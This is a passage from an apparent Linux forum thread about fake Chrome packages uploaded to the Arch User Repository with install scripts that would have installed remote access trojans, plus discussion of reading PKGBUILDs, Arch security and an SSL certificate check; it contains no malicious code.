More RATs found in AUR

Just a heads up–the same user responsible for the RATs in the fake firefox/librewolf/zen packages uploaded a couple more packages today with install scripts that would’ve installed RATs. One was “google-chrome-stable” and the other was “chrome-bin”. There might’ve been a third but I don’t remember seeing what it was called before it was pulled.

The malicious install scripts were hidden pretty sneakily as well so reading the pkgbuild for chrome-bin, it only appeared to pull from debian stable’s chrome. Just another reminder to not only read the pkgbuild but sources and everything else

hard to believe there wasn’t already a chrome-bin in the AUR.

hard to believe they didn’t ban the ff/libre/zen guy the first time he did this

strange things afoot as Bill & Ted waxed

Strangle things are indeed afoot at the circle K

I have never read any sources, or pkg builds, since I have used Linux. I guess I am livin on the edge

How easy is it to see if there is something strange in the pgkbuild? I’m not that familiar with that.

Source please.

Oh, sh*t.

At least with older packages already installed there’s a bit “peace of mind” as stated in the article… I already tried to reduce usage of AUR packages, but for convenience… you know…

These evil, bored people driving me nuts. Should take their energy and knowledge and fix bugs!

Isn’t google-chrome the original one, so I’m assuming google-chrome-stable was created a with a new/random account?

From one of the comments of that article.

Arch is rubbish and it already lacks modern security features like selinux and besides that it would take a team of people likely years to fully take advantage of it since most people will never fully understand it and apparmor is basically doing nothing without more effort and additional steps which can also take some time without a team of people improving it for everyone. Arch has been last to adopt other security features over the years also. These rubbish packages that arch allows should just be dropped, removed and blocked from the distro since only trustworthy sources should be used and warning people about the dangers is not enough since people have no idea what is safe and will use the rubbish unsafe packages anyways.

I think he may have a point about Arch Linux and security, would be nice to have selinux support on Arch Linux. I tried it once but made my system unbootable because you also have to setup all the custom security policies to make it work. But I don’t think he understands AUR PKGBUILDS because he mentions that those packages should be dropped from Arch Linux.

LinuxLiacExpiredSSLCertificate1107×864 107 KB

Anyone getting this error while trying to connect to Linuxiac website? It is showing that the SSL certificate of Linuxiac expired on July 20th.

Certificate chain
0 s:CN=linuxiac.com
i:C=US, O=Let’s Encrypt, CN=E6
a:PKEY: EC, (prime256v1); sigalg: ecdsa-with-SHA384
v:NotBefore: Jul 11 14:13:39 2025 GMT; NotAfter: Oct 9 14:13:38 2025 GMT
1 s:C=US, O=Let’s Encrypt, CN=E6
i:C=US, O=Internet Security Research Group, CN=ISRG Root X1
a:PKEY: EC, (secp384r1); sigalg: sha256WithRSAEncryption
v:NotBefore: Mar 13 00:00:00 2024 GMT; NotAfter: Mar 12 23:59:59 2027 GMT

It’s working OK here.

Are you using Firefox by any chance or some other browser?

Firefox

No, it’s running ok here with arkenfox

Screen_01_08_25_09:531920×1080 122 KB

I don’t think people fully realise the AUR isn’t controlled, it’s open season for anyone to contribute.

No problem with Librewolf and Vivaldi.

The real problem here is that ultra-popular packages like Chrome have no business being in the AUR.

Why aren’t they officially packaged by Arch? I assume some stupid semi-legal reasons.

There is the voting system that ideally helps packages get promoted.

But yes, a lot of the popular AUR packages are there because they kinda have to be.

Just take a look at the highest voted ones and you will notice that with a few notable exceptions, like yay and octopi, that the vast majority of them are proprietary and/or do not allow redistribution, etc.